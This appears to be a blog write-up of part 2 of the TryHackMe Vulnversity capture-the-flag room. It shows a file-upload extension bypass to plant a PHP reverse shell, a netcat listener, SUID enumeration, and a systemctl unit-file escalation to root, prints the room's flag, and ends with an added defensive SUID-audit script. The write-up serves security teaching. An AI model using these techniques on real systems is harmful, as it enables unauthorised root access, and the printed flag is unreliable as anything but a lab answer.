TryHackMe Vulnversity part-2

CTF Writeup

Mukilan Baskaran
2 min read · Jan 1, 2022

Hello guys, in this blog we are going to walk through part 2 of Vulnversity.

Let’s get into part 2 of the Vulnversity challenge. After discovering the /internal directory, there is an option to upload a file. Upload the reverse shell as reverse_shell.phtml, changing the extension from PHP to PHTML. Edit the file to set your IP address and port number.

After uploading the reverse shell, we need to find the page where the file was uploaded. For that we use gobuster again.

From the screenshot, we can see that /uploads was found.

Then start the listener, i.e. "nc -lvnp port", and click the file that was uploaded on the web server.

You will get a remote shell by doing this.

After gaining a shell, you need to look for the user flag.

In order to look for SUID files, use this command:

find / -user root -perm -4000 -exec ls -ldb {} \;

Then you will find /bin/systemctl. With the help of GTFOBins, you can exploit /bin/systemctl and get root.

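# Write a temporary unit file; the SUID systemctl runs its ExecStart as root
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
# Register the unit, then enable and start it in one step
/bin/systemctl link $TF
/bin/systemctl enable --now $TF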

This is used for getting the flag from root.

ans: a58ff8579f0a9270368d33a9966c7fd5
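
The same find command is also useful as a hardening check: compare what it returns against the SUID binaries you expect to see. The script below is an added example, not part of the original writeup. The function name unexpected_suid, the BASELINE allowlist and the SAMPLE listing are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are not in an expected baseline.
# BASELINE is an assumed allowlist; build yours from a known-good image.
BASELINE="/bin/su
/bin/mount
/bin/umount
/bin/ping
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp"

# Reads `ls -ldb` lines on stdin (the output format of the find command
# used in this writeup) and prints each setuid path missing from BASELINE.
unexpected_suid() {
    while read -r mode _links _owner _group _size _mon _day _time path; do
        # Keep only entries whose owner-execute slot is s or S (setuid set).
        case "$mode" in
            ???[sS]*) ;;
            *) continue ;;
        esac
        # Fixed-string, whole-line match so /bin/su never matches /bin/sudo.
        if ! printf '%s\n' "$BASELINE" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Constructed sample listing, not captured from the target machine.
SAMPLE='-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwxr-xr-x 1 root root 1037528 May 16 2017 /bin/bash'

printf '%s\n' "$SAMPLE" | unexpected_suid

# On a real host, as root:
#   find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null | unexpected_suid
```

Anything the function prints should either be added to the baseline deliberately or have its SUID bit removed with chmod u-s.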
